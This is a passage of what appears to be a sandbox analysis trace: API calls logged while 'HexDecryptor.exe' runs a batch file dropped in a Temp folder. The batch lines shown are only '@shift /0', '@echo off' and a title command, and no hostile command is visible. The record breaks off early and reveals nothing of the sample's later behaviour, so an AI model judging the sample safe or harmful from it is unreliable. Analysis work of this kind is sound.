returned 0x27eb56d6ed0 [0124.726] FindClose (in: hFindFile=0x27eb56d8f40 | out: hFindFile=0x27eb56d8f40) returned 1 [0124.727] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0124.727] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0124.727] ??_V@YAXPEAX@Z () returned 0x1 [0124.727] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1f4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0124.808] GetProcessHeap () returned 0x27eb56d0000 [0124.808] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1e8) returned 0x27eb56d8f40 [0124.808] malloc (_Size=0xffce) returned 0x27eb58f0040 [0124.808] ??_V@YAXPEAX@Z () returned 0x27eb58f0040 [0124.808] ApiSetQueryApiSetPresence () returned 0x0 [0124.808] ResolveDelayLoadedAPI () returned 0x7ffcdef41090 [0124.892] SaferWorker () returned 0x0 [0124.920] SetErrorMode (uMode=0x0) returned 0x0 [0124.920] SetErrorMode (uMode=0x1) returned 0x0 [0124.920] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat", nBufferLength=0x7fe7, lpBuffer=0x27eb56e6ab0, lpFilePart=0x9fd6d1f0a0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat", lpFilePart=0x9fd6d1f0a0*="4AD7.bat") returned 0x3d [0124.920] SetErrorMode (uMode=0x0) returned 0x1 [0124.920] malloc (_Size=0x4000) returned 0x27eb58c5960 [0124.920] GetProcessHeap () returned 0x27eb56d0000 [0124.920] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x8c) returned 0x27eb56da900 [0124.920] wcsspn (_String=" C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe", _Control=" \x09") returned 0x1 [0124.920] GetProcessHeap () returned 0x27eb56d0000 [0124.920] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x62) returned 0x27eb56d91b0 [0124.920] GetProcessHeap () returned 0x27eb56d0000 [0124.920] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb4) returned 0x27eb56da9a0 [0124.921] GetProcessHeap () returned 0x27eb56d0000 [0124.921] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56da9a0, Size=0x64) returned 0x27eb56da9a0 [0124.921] GetProcessHeap () returned 0x27eb56d0000 [0124.921] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56da9a0) returned 0x64 [0124.921] ??_V@YAXPEAX@Z () returned 0x1 [0124.921] CmdBatNotificationStub () returned 0x0 [0124.921] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0124.921] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0124.921] _get_osfhandle (_FileHandle=3) returned 0x98 [0124.921] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.922] _get_osfhandle (_FileHandle=3) returned 0x98 [0124.922] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.922] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x246, lpOverlapped=0x0) returned 1 [0124.923] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0124.923] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=11, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="@shift /0\r\n") returned 11 [0124.923] _get_osfhandle (_FileHandle=3) returned 0x98 [0124.923] GetFileType (hFile=0x98) returned 0x1 [0124.923] _get_osfhandle (_FileHandle=3) returned 0x98 [0124.923] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0124.923] GetProcessHeap () returned 0x27eb56d0000 [0124.923] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0124.924] GetProcessHeap () returned 0x27eb56d0000 [0124.924] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0124.924] GetProcessHeap () returned 0x27eb56d0000 [0124.924] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0124.924] _wcsicmp (_String1="shift", _String2=")") returned 74 [0124.924] _wcsicmp (_String1="FOR", _String2="shift") returned -13 [0124.924] _wcsicmp (_String1="FOR/?", _String2="shift") returned -13 [0124.924] _wcsicmp (_String1="IF", _String2="shift") returned -10 [0124.924] _wcsicmp (_String1="IF/?", _String2="shift") returned -10 [0124.924] _wcsicmp (_String1="REM", _String2="shift") returned -1 [0124.924] _wcsicmp (_String1="REM/?", _String2="shift") returned -1 [0124.925] GetProcessHeap () returned 0x27eb56d0000 [0124.925] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daae0 [0124.925] GetProcessHeap () returned 0x27eb56d0000 [0124.925] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1c) returned 0x27eb56d9780 [0124.925] GetProcessHeap () returned 0x27eb56d0000 [0124.925] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x18) returned 0x27eb56da080 [0124.925] _tell (_FileHandle=3) returned 11 [0124.925] _close (_FileHandle=3) returned 0 [0124.925] malloc (_Size=0xffce) returned 0x27eb5900160 [0124.926] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0124.926] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0124.926] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0124.926] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0124.926] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0124.927] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0124.927] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0124.927] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0124.927] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0124.927] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0124.927] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0124.927] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0124.927] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0124.927] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0124.927] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0124.927] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0124.927] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0124.927] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0124.927] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0124.927] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0124.927] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0124.927] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0124.927] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0124.927] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0125.005] malloc (_Size=0xffce) returned 0x27eb5910140 [0125.006] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0125.007] malloc (_Size=0xffce) returned 0x27eb5920120 [0125.007] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0125.008] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0125.008] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0125.008] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0125.008] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0125.008] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0125.008] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0125.008] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0125.008] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0125.008] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0125.008] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0125.008] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0125.008] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0125.008] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0125.008] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0125.008] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0125.008] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0125.008] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0125.008] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0125.009] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0125.009] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0125.009] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0125.009] _wcsicmp (_String1="shift", _String2="SHIFT") returned 0 [0125.009] ??_V@YAXPEAX@Z () returned 0x1 [0125.009] GetProcessHeap () returned 0x27eb56d0000 [0125.009] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x20) returned 0x27eb56d97b0 [0125.009] GetProcessHeap () returned 0x27eb56d0000 [0125.009] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56d97b0, Size=0x1a) returned 0x27eb56d97b0 [0125.009] GetProcessHeap () returned 0x27eb56d0000 [0125.009] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56d97b0) returned 0x1a [0125.010] GetProcessHeap () returned 0x27eb56d0000 [0125.010] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x24) returned 0x27eb56daba0 [0125.010] ??_V@YAXPEAX@Z () returned 0x1 [0125.011] _get_osfhandle (_FileHandle=1) returned 0xc [0125.011] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0125.118] _get_osfhandle (_FileHandle=1) returned 0xc [0125.118] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0125.178] _get_osfhandle (_FileHandle=0) returned 0x8 [0125.178] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0125.279] SetConsoleInputExeNameW () returned 0x1 [0125.279] GetConsoleOutputCP () returned 0x1b5 [0125.446] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0125.446] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.593] ??_V@YAXPEAX@Z () returned 0x1 [0125.594] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0125.595] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0125.595] _get_osfhandle (_FileHandle=3) returned 0x98 [0125.595] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daba0) returned 1 [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d97b0) returned 1 [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56da080) returned 1 [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0125.595] GetProcessHeap () returned 0x27eb56d0000 [0125.595] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0125.595] _get_osfhandle (_FileHandle=3) returned 0x98 [0125.595] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0125.596] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x23b, lpOverlapped=0x0) returned 1 [0125.597] SetFilePointer (in: hFile=0x98, lDistanceToMove=22, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0125.597] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=11, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0125.597] _get_osfhandle (_FileHandle=3) returned 0x98 [0125.597] GetFileType (hFile=0x98) returned 0x1 [0125.597] _get_osfhandle (_FileHandle=3) returned 0x98 [0125.597] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0125.597] GetProcessHeap () returned 0x27eb56d0000 [0125.597] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0125.598] GetProcessHeap () returned 0x27eb56d0000 [0125.598] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0125.598] GetProcessHeap () returned 0x27eb56d0000 [0125.598] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0125.599] _wcsicmp (_String1="echo", _String2=")") returned 60 [0125.599] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0125.599] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0125.599] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0125.599] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0125.599] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0125.637] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0125.637] GetProcessHeap () returned 0x27eb56d0000 [0125.637] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daae0 [0125.637] GetProcessHeap () returned 0x27eb56d0000 [0125.637] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1a) returned 0x27eb56d9780 [0125.637] GetProcessHeap () returned 0x27eb56d0000 [0125.637] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1a) returned 0x27eb56d97b0 [0125.638] _tell (_FileHandle=3) returned 22 [0125.639] _close (_FileHandle=3) returned 0 [0125.639] malloc (_Size=0xffce) returned 0x27eb5900160 [0125.640] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0125.641] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0125.641] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0125.641] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0125.641] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0125.641] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0125.641] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0125.641] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0125.641] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0125.641] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0125.641] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0125.641] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0125.749] malloc (_Size=0xffce) returned 0x27eb5910140 [0125.749] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0125.749] malloc (_Size=0xffce) returned 0x27eb5920120 [0125.750] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0125.750] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0125.750] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0125.750] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0125.750] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0125.750] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0125.750] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0125.750] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0125.750] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0125.750] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0125.750] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0125.751] ??_V@YAXPEAX@Z () returned 0x1 [0125.751] GetProcessHeap () returned 0x27eb56d0000 [0125.751] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x24) returned 0x27eb56daba0 [0125.751] GetProcessHeap () returned 0x27eb56d0000 [0125.751] RtlReAllocateHeap (Heap=0x27eb56d0000, Flags=0x0, Ptr=0x27eb56daba0, Size=0x1a) returned 0x27eb56daba0 [0125.751] GetProcessHeap () returned 0x27eb56d0000 [0125.751] RtlSizeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, MemoryPointer=0x27eb56daba0) returned 0x1a [0125.751] GetProcessHeap () returned 0x27eb56d0000 [0125.751] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x24) returned 0x27eb56dabd0 [0125.751] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0125.751] ??_V@YAXPEAX@Z () returned 0x1 [0125.752] _get_osfhandle (_FileHandle=1) returned 0xc [0125.752] SetConsoleMode (hConsoleHandle=0xc, dwMode=0x7) returned 1 [0126.066] _get_osfhandle (_FileHandle=1) returned 0xc [0126.066] GetConsoleMode (in: hConsoleHandle=0xc, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0126.161] _get_osfhandle (_FileHandle=0) returned 0x8 [0126.161] GetConsoleMode (in: hConsoleHandle=0x8, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0126.197] SetConsoleInputExeNameW () returned 0x1 [0126.197] GetConsoleOutputCP () returned 0x1b5 [0126.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0126.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.879] ??_V@YAXPEAX@Z () returned 0x1 [0126.880] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\4AD5.tmp\\4AD6.tmp\\4AD7.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\4ad5.tmp\\4ad6.tmp\\4ad7.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9fd6d1eee8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0126.880] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0126.880] _get_osfhandle (_FileHandle=3) returned 0x98 [0126.881] SetFilePointer (in: hFile=0x98, lDistanceToMove=22, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56dabd0) returned 1 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daba0) returned 1 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d97b0) returned 1 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56d9780) returned 1 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daae0) returned 1 [0126.881] GetProcessHeap () returned 0x27eb56d0000 [0126.881] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56daa20) returned 1 [0126.881] _get_osfhandle (_FileHandle=3) returned 0x98 [0126.881] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x16 [0126.881] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9fd6d1eea0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x9fd6d1eea0*=0x230, lpOverlapped=0x0) returned 1 [0126.881] SetFilePointer (in: hFile=0x98, lDistanceToMove=54, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x36 [0126.881] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=32, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="title HexadecimalDecryptor 1.0\r\n") returned 32 [0126.881] _get_osfhandle (_FileHandle=3) returned 0x98 [0126.881] GetFileType (hFile=0x98) returned 0x1 [0126.881] _get_osfhandle (_FileHandle=3) returned 0x98 [0126.882] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x36 [0126.882] GetProcessHeap () returned 0x27eb56d0000 [0126.882] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x4012) returned 0x27eb56df1c0 [0126.882] GetProcessHeap () returned 0x27eb56d0000 [0126.882] RtlFreeHeap (HeapHandle=0x27eb56d0000, Flags=0x0, BaseAddress=0x27eb56df1c0) returned 1 [0126.883] _wcsicmp (_String1="title", _String2=")") returned 75 [0126.883] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0126.883] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0126.883] _wcsicmp (_String1="IF", _String2="title") returned -11 [0126.883] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0126.883] _wcsicmp (_String1="REM", _String2="title") returned -2 [0126.883] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0126.883] GetProcessHeap () returned 0x27eb56d0000 [0126.883] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0xb0) returned 0x27eb56daa20 [0126.883] GetProcessHeap () returned 0x27eb56d0000 [0126.883] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x1c) returned 0x27eb56d9780 [0126.884] GetProcessHeap () returned 0x27eb56d0000 [0126.884] RtlAllocateHeap (HeapHandle=0x27eb56d0000, Flags=0x8, Size=0x44) returned 0x27eb56deaa0 [0126.884] _tell (_FileHandle=3) returned 54 [0126.884] _close (_FileHandle=3) returned 0 [0126.885] malloc (_Size=0xffce) returned 0x27eb5900160 [0126.885] ??_V@YAXPEAX@Z () returned 0x27eb5900160 [0128.405] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0128.405] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0128.405] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0128.405] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0128.405] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0128.405] _wcsicmp (_String1="title", _String2="CD") returned 17 [0128.405] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0128.405] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0128.405] _wcsicmp (_String1="title", _String2="REN") returned 2 [0128.405] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0128.405] _wcsicmp (_String1="title", _String2="SET") returned 1 [0128.405] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0128.405] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0128.405] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0128.405] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0128.405] _wcsicmp (_String1="title", _String2="MD") returned 7 [0128.405] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0128.405] _wcsicmp (_String1="title", _String2="RD") returned 2 [0128.405] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0128.405] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0128.405] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0128.406] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0128.406] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0128.406] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0128.406] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0128.406] _wcsicmp (_String1="title", _String2="VER") returned -2 [0128.406] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0128.406] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0128.406] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0128.406] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0128.406] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0128.406] GetConsoleTitleW (in: lpConsoleTitle=0x9fd6d1ec90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\FD1HVy\\Desktop\\HexDecryptor.exe") returned 0x29 [0128.476] malloc (_Size=0xffce) returned 0x27eb5910140 [0128.477] ??_V@YAXPEAX@Z () returned 0x27eb5910140 [0128.477] malloc (_Size=0xffce) returned 0x27eb5920120 [0128.477] ??_V@YAXPEAX@Z () returned 0x27eb5920120 [0128.478] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0128.478] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0128.478] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0128.478] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0128.478] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0128.478] _wcsicmp (_String1="title", _String2="CD") returned 17 [0128.478] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0128.478] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0128.478] _wcsicmp (_String1="title", _String2="REN") returned 2 [0128.478] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0128.478] _wcsicmp (_String1="title", _String2="SET") returned 1 [0128.478] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0128.478] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0128.478] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0128.478] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0128.478] _wcsicmp (_String1="title", _String2="MD") returned 7 [0128.478] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0128.479] _wcsicmp (_String1="title", _String2="RD") returned 2 [0128.479] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0128.479] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0128.479] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0128.479] _wcsicmp (_String1="title", _String2="SHIFT") returned 